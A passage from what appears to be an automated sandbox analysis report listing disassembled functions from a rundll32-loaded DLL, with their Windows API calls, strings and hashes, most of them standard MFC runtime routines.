                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                    • API String ID: 2102423945-4122032997
                                                                                                                    • Opcode ID: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                    • Instruction ID: bbe41a20c7329c8f9bdc0efe2c46215e461a01fcfe5e7bc54fed728f21783543
                                                                                                                    • Opcode Fuzzy Hash: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                    • Instruction Fuzzy Hash: B0816076D04219AADB40EFA4D481BDEBBF8EF04384F518566F909EB181E774DAC4CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10021D88 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                    • lstrlenA.KERNEL32(?), ref: 10021DFA
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                    • String ID: System
                                                                                                                    • API String ID: 1529587224-3470857405
                                                                                                                    • Opcode ID: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                    • Instruction ID: 0e81d0f59cd66082c3aa20aff96d3ec22f48ed16ea157d431ad3d5bc96dc32b7
                                                                                                                    • Opcode Fuzzy Hash: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                    • Instruction Fuzzy Hash: B441C275900215DFDF14CFA4DD85AEEBBB5EF14310F51822AE802DB285EB70A946CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100233C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                    • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                    • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                    • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                    • API String ID: 2418878492-2500072749
                                                                                                                    • Opcode ID: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                    • Instruction ID: 416d3485c59068a364c2a46f33bf17d30033b20eabc5154db7a9307924c289c3
                                                                                                                    • Opcode Fuzzy Hash: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                    • Instruction Fuzzy Hash: 45318F74A006449FCF06EFA0D8957AD77F9EF48300F914098E905EB292DB78EE04CB55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10015723 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                    • _memset.LIBCMT ref: 1001579D
                                                                                                                    • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                    • LoadBitmapA.USER32 ref: 10015807
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4271682439-3916222277
                                                                                                                    • Opcode ID: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
                                                                                                                    • Instruction ID: fd313e63bbbbf4de8925541e866d87c57cd6a5f11e69b9eb671f3de319ba3105
                                                                                                                    • Opcode Fuzzy Hash: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
                                                                                                                    • Instruction Fuzzy Hash: 2831C072A00216DFEB10CF78DDCAAAE7BB5EB44645F15052AE506EF2C1E631E9448750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10023B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                    • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                    • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                    • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2429671754-3916222277
                                                                                                                    • Opcode ID: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                    • Instruction ID: e2743fe1d96de1c748b152781f443ff04db9fb8b7a9177862e5f836bc5268938
                                                                                                                    • Opcode Fuzzy Hash: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                    • Instruction Fuzzy Hash: 5A41AD38D01289DEDB11CFE4D951ADDFBF4EF18340F20816AE945EB292EB749A44CB11
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10018D05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                    • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                    • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: System$Metrics$InfoParameters
                                                                                                                    • String ID: B$DISPLAY
                                                                                                                    • API String ID: 3136151823-3316187204
                                                                                                                    • Opcode ID: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                    • Instruction ID: a878fcb1cedf1c60654c719a4428af0d7f153658fed9e58891951680bc1a7591
                                                                                                                    • Opcode Fuzzy Hash: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                    • Instruction Fuzzy Hash: 7F119471900334EBDF11DF54AC8465A7BA8EF1A794F004061FE08AE086D270DB40CBD1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10016D6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Edit
                                                                                                                    • API String ID: 0-554135844
                                                                                                                    • Opcode ID: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                    • Instruction ID: d7da207644b64a2d982eb74dcfc255ba7c8492391b78acd90f64b6ebdbaccf44
                                                                                                                    • Opcode Fuzzy Hash: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                    • Instruction Fuzzy Hash: 5401C034B00222ABEA50DA35DC45B5AB6F9EF4E795F120524F512EE0A1DF70ECC1C666
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10023C5A Relevance: 7.6, APIs: 5, Instructions: 108windowthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                    • SendMessageA.USER32 ref: 10023CD9
                                                                                                                    • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                    • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                    • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 187318432-0
                                                                                                                    • Opcode ID: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                    • Instruction ID: d28fad7a3843e667b269742353e4bf680cf5f7ebce9377355bc1d9e2da6f7a14
                                                                                                                    • Opcode Fuzzy Hash: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                    • Instruction Fuzzy Hash: 99416A38400746DFCB20DF64D845A9EB7F1FF08310F618959F9969B2A1EB74E941CB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10016461 Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                      • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 69039007-0
                                                                                                                    • Opcode ID: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
                                                                                                                    • Instruction ID: 2ee7fd04e7e526f2a2658ba16ac7fadb449e12f7dad9b6db0157347413a913f7
                                                                                                                    • Opcode Fuzzy Hash: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
                                                                                                                    • Instruction Fuzzy Hash: 3A21D075D0025ADBDB21CB94CC416EEB7B0EF08350F10412AED41AB290EB30AE84DBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002B3A9 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                    • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                    • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                      • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                      • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                    • MulDiv.KERNEL32 ref: 1002B420
                                                                                                                    • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Mode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 696222070-0
                                                                                                                    • Opcode ID: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                    • Instruction ID: 63e99b0baf6d5dcfdd2b5bb48b7ec33f4fcd9c2a57d1919fdecc035dbf7e745c
                                                                                                                    • Opcode Fuzzy Hash: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                    • Instruction Fuzzy Hash: 2D110E71600A14EFDB21AF55CC84C0EBBE9EF89350B514829FA8597361DB31ED01CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002B437 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                    • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                    • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                      • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                      • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                    • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                    • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Mode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 696222070-0
                                                                                                                    • Opcode ID: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                    • Instruction ID: 3f65263faca37ec2066e18a28c5c11a55be6ae6448755079bbf75ecdaa8dd8b2
                                                                                                                    • Opcode Fuzzy Hash: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                    • Instruction Fuzzy Hash: 2511CE75600A14EFDB21AF55CC84C1EBBEAEF89750B118819FA8597361DB31EC01DB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100203DD Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                    • _memset.LIBCMT ref: 10020424
                                                                                                                    • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                    • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 289641511-0
                                                                                                                    • Opcode ID: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
                                                                                                                    • Instruction ID: 8c1f3c136944a2c7f84d91cd4eaa34ef9436e2c15ebeed6ca137d0836ccfc0fa
                                                                                                                    • Opcode Fuzzy Hash: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
                                                                                                                    • Instruction Fuzzy Hash: CE01DBB5600314A7E711DF64DDC4BDF77ADEB19341F408065F646D3142EAB09E448B61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100329FD Relevance: 7.5, APIs: 5, Instructions: 43threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                      • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                      • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                      • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                      • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                    • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                      • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                    • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                    • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2731880238-0
                                                                                                                    • Opcode ID: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                    • Instruction ID: 3ca39206478dd66d9189836c3fdd0f1ffde406c57308cf63c3fc949a3eb6cb77
                                                                                                                    • Opcode Fuzzy Hash: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                    • Instruction Fuzzy Hash: 9F015E784046519FDB06EBA1DE4594E7BA9EF48243F208458E905CF232DB35E841CB52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10012890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                    • SetWindowLongA.USER32 ref: 10012989
                                                                                                                      • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
